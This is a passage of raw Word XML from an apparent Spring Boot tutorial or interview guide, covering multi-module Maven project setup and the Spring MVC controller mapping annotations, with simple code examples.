    </w:p>
    <w:p w14:paraId="01C3C773"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC74318"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artifactId&gt;spring-boot-starter-parent&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65D207"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version&gt;2.5.4&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56372D02"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relativePath/&gt; &lt;!-- lookup parent from repository --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC69718"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F46BD"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dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769A465"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dependencyManagement&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD46119" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409DF4F1"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build&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA9AF2"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pluginManagement&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6DDC7"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plugins&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D96E70D"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plugin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712A8356"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD5B21"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artifactId&gt;spring-boot-maven-plugin&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DAF38"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plugin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57D3F4"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plugins&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B24F6"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pluginManagement&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975CBCE"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build&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771880E3"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lt;/project&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215899E" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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3. Create Submodules (Modules) in the Parent Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D1D56"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Each submodule should have its own pom.xml file. These modules will depend on the parent pom.xml for configuration and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6B22CB"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Example module-api/pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55229937"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lt;project xmlns="http://maven.apache.org/POM/4.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5CBA29"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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E6EF1"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xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D2E84C"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modelVersion&gt;4.0.0&lt;/modelVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A266FCC" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9BA3D4"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parent&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8B0C4"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groupId&gt;com.example&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2243F"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artifactId&gt;spring-boot-multi-module&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC564F2"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version&gt;1.0-SNAPSHOT&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE6C82"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relativePath&gt;../pom.xml&lt;/relativePath&gt; &lt;!-- Parent pom file --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5593D7"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parent&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A156611" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F94E2D"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artifactId&gt;module-api&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438F070" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676CB53A"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dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50716948"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 Dependencies for module-api --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0C89F"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D50F5"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75978EA2"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artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247CF91"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2CB1D"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dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2866DE6B"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lt;/project&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F8245"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lastRenderedPageBreak/>
        <w:t>Similarly, create module-service, module-data, and module-web submodules, adjusting the artifactId for each module and adding specific dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E54AEA" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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4. Module-specific Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77AF2D"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Module API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the REST API layer (Controllers, DTOs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568825B7"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Module Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the service layer, business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BCB8D"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Module Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the data access layer, repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055CB38C"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Module Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains configurations and application entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060B4BC"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Example for a simple </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in module-api:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290276F3"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A1C45"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B74A8"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F738F5" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F50E65F"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA29C68"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MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62573013" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DC3121"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GetMapping("/greet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B558BDE"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String greet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274803E"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myService.getGreeting();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68A4AA"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5B81D4F0"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1ED2EA75"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Example of </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in module-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C795A3B"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76874719"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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBF76BA" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523AA618"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String getGreeting() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02CF78"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Hello from the Service Layer!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE05E3"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7594A064"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61DA0EBE" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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5. Enable Spring Boot Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057476F4"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n one of the submodules (usually module-web), define the @SpringBootApplication class, which is the entry point to your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60041FA4"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Example in module-web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193ECED7"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991D60A"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Application {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCFF80" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75727803"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372F2DE"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SpringApplication.run(Application.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDBF828"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30CBD147"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162853DB" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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6. Running the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425C1D7"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After defining the modules, you can run the application either as a whole or by running individual modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A214E"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un the parent project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The parent project will build and package the entire application with all submodules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692CA31F"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un specific modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also run each module individually by navigating to the module folder and running the application directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707ACAC7"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n the terminal, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2316D"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mvn clean install   # Build the entire project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEE344"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mvn spring-boot:run  # Run the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449151D0" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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7. Managing Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC758E"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Ensure that the modules depend on each other as needed. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11367CAA"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module-web can depend on module-service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72594272"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module-service can depend on module-api.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557148F"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module-api may not depend on anything else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCA99C"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Dependencies can be managed by adding them in the pom.xml files under the &lt;dependencies&gt; section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3A295" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644110F5"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">By using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-module Maven project</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot, you can logically divide your application into different layers or services (e.g., API, service, data, web). This modular approach improves maintainability, scalability, and testing, and it allows you to organize the application into logical components that can be built and deployed independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09732018" w14:textId="79A58019"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AC60472">
          <v:rect id="_x0000_i2516" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="738F8C7E" w14:textId="659460AB" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD4F70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="580" w:name="_Toc196308060"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are all methods present in the controller</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="580"/>
    </w:p>
    <w:p w14:paraId="6616C488" w14:textId="0517702D" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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n a Spring MVC controller, there are various methods you can define to handle HTTP requests. These methods are annotated with Spring annotations that define how the request is mapped to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E79BD" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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Common Methods in a Spring MVC Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19110375"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equestMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The most general annotation for mapping HTTP requests to handler methods of MVC and REST controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE5108"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C377C37"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questMapping("/home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A541CB"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String home() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9CD4F"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home";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A60AE6"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13FCB9B4"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t can handle all HTTP methods (GET, POST, PUT, DELETE, etc.). However, to be more specific, other annotations are often used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CDEF1"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GetMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.GET). It maps HTTP GET requests to the handler method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1B85E"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FAA871"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GetMapping("/getUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1CDD07"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User getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158378C"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new User("John", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057E62D"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272630FA"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ostMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.POST). It maps HTTP POST requests to the handler method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31BE7C"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326588D1"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ostMapping("/createUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E97CF"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String createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0852D0E5"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Save user logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C249BDC"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User created";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C2960"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5D4C3BCA"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utMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.PUT). It maps HTTP PUT requests to the handler method, typically used for updating resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E8E25"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC01281"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tMapping("/updateUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C92E2BC"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String updateUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A113A83"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Update user logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE82F0"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User updated";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF218BD"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21ABE5B3"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DeleteMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.DELETE). It maps HTTP DELETE requests to the handler method, typically used for deleting resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97D21A"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6413A1"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DeleteMapping("/deleteUser/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351B558"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String deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6D11B"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Delete user logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0AE03"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User deleted";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07105B39"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1988462E"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atchMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a shorthand for @RequestMapping(method = RequestMethod.PATCH). It is used for making partial updates to a resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF911D7"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E2D00"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atchMapping("/updateUserPartial/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F812A90"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String updateUserPartial(@PathVariable Long id, @RequestBody Map&lt;String, String&gt; updates) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A921C"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Partial update logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD3EDB4"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User partially updated";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3952C857"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC830E" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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Additional Methods and Annotations in a Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C7493"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equestParam</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To extract query parameters from the request URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30DFA2"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
